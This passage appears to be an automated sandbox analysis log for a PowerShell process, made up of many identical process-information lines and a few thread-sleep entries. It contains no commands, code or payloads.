            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2924Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6992Thread sleep count: 5626 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7280Thread sleep count: 33 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6988Thread sleep count: 1533 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7504Thread sleep time: -12912720851596678s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -11990383647911201s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7320Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7204Thread sleep count: 4906 > 30
